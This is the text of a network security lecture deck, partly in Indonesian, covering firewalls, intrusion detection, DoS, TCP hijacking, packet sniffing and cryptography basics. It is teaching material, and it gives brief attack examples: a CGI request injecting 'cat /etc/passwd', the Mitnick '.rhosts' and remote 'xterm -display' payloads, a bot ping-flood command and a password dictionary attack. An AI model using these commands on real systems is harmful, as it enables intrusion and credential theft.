NETWORK SECURITY Indra Priyandono
A Brief History of the World
Overview Apa itu security? Kenapa kita perlu security? Apa saja yang rentan? Serangan keamanan umum dan penanggulangan Firewalls & Intrusion Detection Systems Denial of Service Attacks TCP Attacks Packet Sniffing Social Problems
Apakah itu“Security” Dictionary.com : 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear; confidence. 3. Something that gives or assures safety, as: 1. A group or department of private guards: Call building security if a visitor acts suspicious. 2. Measures adopted by a government to prevent espionage, sabotage, or attack. 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc.
Apakah itu“Security” Dictionary.com says: 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear; confidence. 3. Something that gives or assures safety, as: 1. A group or department of private guards: Call building security if a visitor acts suspicious. 2. Measures adopted by a government to prevent espionage, sabotage, or attack. 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. - Kebebasan dari risiko atau bahaya, keamanan Dengan kata lain, memiliki sistem di tempat sebelumnya yang mencegah serangan sebelum mereka mulai.
Apakah itu“Security” Dictionary.com says: 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear; confidence. 3. Something that gives or assures safety, as: 1. A group or department of private guards: Call building security if a visitor acts suspicious. 2. Measures adopted by a government to prevent espionage, sabotage, or attack. 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. Kebebasan dari keraguan, kecemasan, atau ketakutan; keyakinan Terkait dengan definisi pertama, memiliki ketenangan pikiran mengetahui bahwa sistem Anda aman dan dilindungi.
Apakah itu“Security” Dictionary.com says: 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear; confidence. 3. Something that gives or assures safety, as: 1. A group or department of private guards: Call building security if a visitor acts suspicious. 2. Measures adopted by a government to prevent espionage, sabotage, or attack. 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. Ini termasuk rencana kontingensi untuk apa yang harus dilakukan ketika penyerang menyerang, menjaga dengan CERT advisory terbaru, menyewa konsultan keamanan jaringan untuk menemukan rasa tidak aman dalam jaringan Anda, dll
Kenapa Kita Perlu Security? Melindungi informasi penting sementara masih memungkinkan akses ke mereka yang membutuhkannya Trade secrets, medical records, dll. Menyediakan otentikasi dan kontrol akses untuk sumber daya Ex: AFS Jaminan ketersediaan sumber daya Ex: 5 9’s (99.999% reliability)
Apa saja yang Rentan? Lembaga keuangan dan bank Penyedia layanan Internet Perusahaan farmasi Instansi pemerintah dan pertahanan Kontraktor ke berbagai instansi pemerintah Perusahaan multinasional ANYONE ON THE NETWORK!
Serangan Keamanan Umum dan Penanggulangan Menemukan jalan ke jaringan Firewalls Pemanfaatan software bug, buffer overflows Intrusion Detection Systems Denial of Service Ingress filtering, IDS Buffer overflow merupakan sebuah keadaan anomali di mana sebuah proses menunjukkan perilaku yang aneh disebabkan karena adanya data-data yang disimpan melebihi kapasitas buffer memorinya
Serangan Keamanan Umum dan Penanggulangan TCP hijacking IPSec Packet sniffing Encryption (SSH, SSL, HTTPS) Social problems Education
Firewalls Masalah dasar - banyak aplikasi jaringan dan protokol memiliki masalah keamanan yang tetap dari waktu ke waktu Menjaga agar host selalu aman Solution Administrator membatasi akses ke host dengan menggunakan firewall Firewall tetap up-to-date oleh
Firewalls Firewall adalah seperti sebuah kastil dengan jembatan tarik Hanya satu titik akses ke jaringan Ini bisa baik atau buruk Bisa hardware atau software Ex. beberapa routers dengen fungsi firewall ipfw, ipchains, pf pada Unix systems, Windows XP dan Mac OS X mempunyai firewalls bult in Mengapa baik? Karena memungkinkan Anda menyaring apa yang masuk dan apa yang keluar. Mengapa buruk? Jika saat itu turun, Anda terputus dari orang lain. Juga, mungkin memiliki banyak kemacetan di satu titik.
Firewalls DMZ Internet Intranet Firewall Web server, email server, web proxy, etc
Firewalls Digunakan untuk paket filter didasarkan pada kombinasi dari fitur Ini disebut packet filtering firewall Ex. Drop paket dengan port tujuan 23 (Telnet) Dapat menggunakan kombinasi dari IP/UDP/TCP header informasi manual ipfw pada unix utnuk lebih detail
Firewalls Berikut adalah komputer default Windows XP terlihat seperti: 135/tcp open loc-srv 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 3389/tcp open ms-term-serv 5000/tcp open UPnP Mungkin perlu beberapa layanan tsb, atau kita tidak dapat mengontrol semua mesin pada jaringan
Firewalls Aturan firewall terlihat seperti apa? Tergantung pada firewall digunakan Example: ipfw /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet Contoh lain: WinXP & Mac OS X mempunyai built in firewalls GUI yang berbeda Macam kompleksitasnya
Intrusion Detection Digunakan untuk memantau "aktivitas yang mencurigakan" pada jaringan Dapat melindungi terhadap eksploitasi perangkat lunak yang diketahui, seperti buffer overflows Open Source IDS: Snort, www.snort.org
Intrusion Detection Menggunakan “intrusion signatures” Mengenali patterns of behavior Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc. Example IRIX vulnerability pada webdist.cgi “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd” Namun, IDS hanya berguna untuk mengetahui jika ada rencana kemungkinan serangan
Minor Detour… Say we got the /etc/passwd file from the IRIX server What can we do with it?
Dictionary Attack We can run a dictionary attack on the passwords The passwords in /etc/passwd are encrypted with the crypt(3) function (one-way hash) Can take a dictionary of words, crypt() them all, and compare with the hashed passwords This is why your passwords should be meaningless random junk! For example, “sdfo839f” is a good password That is not my andrew password Please don’t try it either
Denial of Service Tujuan: Membuat layanan jaringan tidak dapat digunakan, biasanya dengan melakukan overloading server atau jaringan Berbagai jenis serangan DoS SYN flooding SMURF Distributed attacks
Denial of Service Normal 3-way Handshake SYN: PC Pengguna: “Hallo” ACK-SYN: Server: “Anda ingin berkomunikasi?” ACK: PC Pengguna “Ya” DoS Handshake SYN: PC Pengguna mengirim “hallo” berulang-ulang ACK-SYN: Server merespons “Komunikasi?” berulang-ulang No Response: PC Pengguna menunggu sampai server “timeout” Pengguna Server Forge source IP so that the victim can’t figure out who you are.
Attacker Utama Attacker 1 Attacker 2 Attacker 3 Attacker 4 Attacker 5 Attacker 6 Attacker 7 Attacker 8 Server Attacker utama melancarkan SYN floods dari beberapa tempat
Denial of Service
Denial of Service Ping broadcast (smurf) Menggunakan IPspoofing (mengubah no IP dari request) Respon dari ping dialamatkan ke komputer yang IP-nya dispoof Akibatnya komputer tersbut akan banyak menerima paket Terjadi pemborosan bandwidth Dapat mengakibatkan DoS Attack
Denial of Service
Denial of Service Distributed Denial of Service Sama seperti teknik DoS biasa, tetapi pada skala yang jauh lebih besar Example: Sub7Server Trojan dan IRC bots Menginfeksi sejumlah besar mesin dengan program "zombie" Program Zombie log in ke IRC dan menunggu perintah Example: Perintah Bot: !p4 207.71.92.193 hasil: runs ping.exe 207.71.92.193 -l 65500 -n 10000 mengirim 10,000 64k packets ke host (655MB!)
Denial of Service Mini Case Study – CodeRed July 19, 2001: over 359,000 computers infected with Code-Red in less than 14 hours Used a recently known buffer exploit in Microsoft IIS Damages estimated in excess of $2.6 billion
Denial of Service Why is this under the Denial of Service category? CodeRed launched a DDOS attack against www1.whitehouse.gov from the 20th to the 28th of every month! Spent the rest of its time infecting other hosts
Denial of Service Ingress filtering How can we protect ourselves? Ingress filtering If the source IP of a packet comes in on an interface which does not have a route to that packet, then drop it RFC 2267 has more information about this Stay on top of CERT advisories and the latest security patches A fix for the IIS buffer overflow was released sixteen days before CodeRed had been deployed!
TCP Attacks Recall how IP works… End hosts create IP packets and routers process them purely based on destination address alone Problem: End hosts may lie about other fields which do not affect delivery Source address – host may trick destination into believing that the packet is from a trusted source Especially applications which use IP addresses as a simple authentication method Solution – use better authentication methods
TCP Attacks Starting sequence numbers, port numbers TCP connections have associated state Starting sequence numbers, port numbers Problem – what if an attacker learns these values? Port numbers are sometimes well known to begin with (ex. HTTP uses port 80) Sequence numbers are sometimes chosen in very predictable ways
TCP Attacks If an attacker learns the associated TCP state for the connection, then the connection can be hijacked! Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source Ex. Instead of downloading and running new program, you download a virus and execute it
TCP Attacks Say hello to Alice, Bob and Mr. Big Ears
TCP Attacks Alice and Bob have an established TCP connection
TCP Attacks He can intercept all of their packets Mr. Big Ears lies on the path between Alice and Bob on the network He can intercept all of their packets
TCP Attacks Packets The Void First, Mr. Big Ears must drop all of Alice’s packets since they must not be delivered to Bob (why?) Packets Alice can send a RESET The Void
TCP Attacks ISN, SRC=Alice Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network) ISN, SRC=Alice
TCP Attacks Can just DoS Alice instead of dropping her packets What if Mr. Big Ears is unable to sniff the packets between Alice and Bob? Can just DoS Alice instead of dropping her packets Can just send guesses of what the ISN is until it is accepted How do you know when the ISN is accepted? Mitnick: payload is “add self to .rhosts” Or, “xterm -display MrBigEars:0”
TCP Attacks Web server Trusting web client Malicious user Why are these types of TCP attacks so dangerous? Malicious user can send a virus to the trusting web client, instead of the program they thought they were downloading. Web server Trusting web client Malicious user
TCP Attacks How do we prevent this? IPSec Provides source authentication, so Mr. Big Ears cannot pretend to be Alice Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is
Packet Sniffing Ingat bagaimana Ethernet bekerja ... Ketika seseorang ingin mengirim paket ke tujuan... Mereka menempatkan bit pada kabel dengan tujuan alamat MAC ... Dan ingat bahwa host lain mendengarkan pada kawat untuk mendeteksi collisions ... Ini tidak bisa lebih mudah untuk mencari tahu data apa yang sedang dikirim melalui jaringan!
Packet Sniffing Ini bekerja untuk wireless juga! Bahkan, ia bekerja untuk setiap media broadcast-based
Packet Sniffing Data jenis apa yang bisa kita dapatkan? Ditanyakan cara lain, apa jenis informasi akan sangat berguna untuk pengguna berbahaya? Jawaban: Apa pun dalam teks biasa (plaintext) Paling popular adalah Password
Packet Sniffing Bagaimana kita bisa melindungi diri kita sendiri? SSH, bukan Telnet Banyak orang menggunakan Telnet dan mengirim password mereka dengan jelas (menggunakan Putty sebagai gantinya!) HTTP over SSL Terutama ketika melakukan pembelian dengan kartu kredit! SFTP, bukan FTP Kecuali Anda benar-benar tidak peduli tentang password atau data IPSec Menyediakan kerahasiaan pada network-layer
Kriptografi
Tujuan Ada empat tujuan mendasar dari ilmu kriptografi ini yang juga merupakan aspek keamanan informasi yaitu : Kerahasiaan, adalah layanan yang digunakan untuk menjaga isi dari informasi dari siapapun kecuali yang memiliki otoritas ataukunci rahasia untuk membuka/mengupas informasi yang telah disandi. Integritas data, adalah berhubungan dengan penjagaan dari perubahan data secara tidak sah. Untuk menjaga integritas data, sistem harus memiliki kemampuan untuk mendeteksi manipulasi data oleh pihak-pihak yang tidak berhak, antara lain penyisipan, penghapusan, dan pensubsitusian data lain kedalam data yang sebenarnya.
Autentikasi, adalah berhubungan dengan identifikasi/pengenalan, baik secara kesatuan sistem maupun informasi itu sendiri. Dua pihak yang saling berkomunikasi harus saling memperkenalkan diri. Informasi yang dikirimkan melalui kanal harus diautentikasi keaslian, isi datanya, waktu pengiriman, dan lain-lain. Non-repudiasi., atau nirpenyangkalan adalah usaha untuk mencegah terjadinya penyangkalan terhadap pengiriman/terciptanya suatu informasi oleh yang mengirimkan/membuat.
Algoritma Sandi Algoritma sandi adalah algoritma yang berfungsi untuk melakukan tujuan kriptografis Algoritma tersebut harus memiliki kekuatan untuk melakukan (dikemukakan oleh Shannon): konfusi/pembingungan (confusion), dari teks terang sehingga sulit untuk direkonstruksikan secara langsung tanpa menggunakan algoritma dekripsinya difusi/peleburan (difusion), dari teks terang sehingga karakteristik dari teks terang tersebut hilang.
Secara umum berdasarkan kesamaan kuncinya, algoritma sandi dibedakan menjadi kunci-simetris/symetric-key, sering disebut juga algoritma sandi konvensional karena umumnya diterapkan pada algoritma sandi klasik kunci-asimetris/asymetric-key
Berdasarkan arah implementasi dan pembabakan jamannya dibedakan menjadi : algoritma sandi klasik classic cryptography algoritma sandi modern modern cryptography
Berdasarkan kerahasiaan kuncinya dibedakan menjadi : algoritma sandi kunci rahasia secret-key algoritma sandi kunci publik publik-key
Algoritma sandi kunci-simetris Skema algoritma sandi akan disebut kunci-simetris apabila untuk setiap proses enkripsi maupun dekripsi data secara keseluruhan digunakan kunci yang sama. Skema ini berdasarkan jumlah data per proses dan alur pengolahan data didalamnya dibedakan menjadi dua kelas, yaitu block-cipher dan stream-cipher.
Block-Cipher ECB, Electronic Code Book CBC, Cipher Block Chaining OFB, Output Feed Back CFB, Cipher Feed Back
Stream-Cipher Stream-cipher adalah algoritma sandi yang mengenkripsi data persatuan data, seperti bit, byte, nible atau per lima bit(saat data yang di enkripsi berupa data Boudout). Setiap mengenkripsi satu satuan data digunakan kunci yang merupakan hasil pembangkitan dari kunci sebelum.
Algoritma-algoritma sandi kunci-simetris Beberapa contoh algoritma yang menggunakan kunci-simetris: DES - Data Encryption Standard blowfish twofish MARS IDEA 3DES - DES diaplikasikan 3 kali AES - Advanced Encryption Standard, yang bernama asli rijndael
Fungsi Hash Kriptografis Fungsi hash yang memiliki beberapa sifat keamanan tambahan sehingga dapat dipakai untuk tujuan keamanan data Digunakan untuk keperluan autentikasi dan integritas data Secara efisien mengubah string input dengan panjang berhingga menjadi string output dengan panjang tetap yang disebut nilai hash
Sifat-Sifat Fungsi Hash Kriptografi Tahan preimej (Preimage resistant): bila diketahui nilai hash h maka sulit (secara komputasi tidak layak) untuk mendapatkan m dimana h = hash(m). Tahan preimej kedua (Second preimage resistant): bila diketahui input m1 maka sulit mencari input m2 (tidak sama dengan m1) yang menyebabkan hash(m1) = hash(m2). Tahan tumbukan (Collision-resistant): sulit mencari dua input berbeda m1 dan m2 yang menyebabkan hash(m1) = hash(m2)
Algoritma-Algoritma Fungsi Hash Kriptografi Beberapa contoh algoritma fungsi hash Kriptografi: MD4 MD5 SHA-0 SHA-1 SHA-256 SHA-512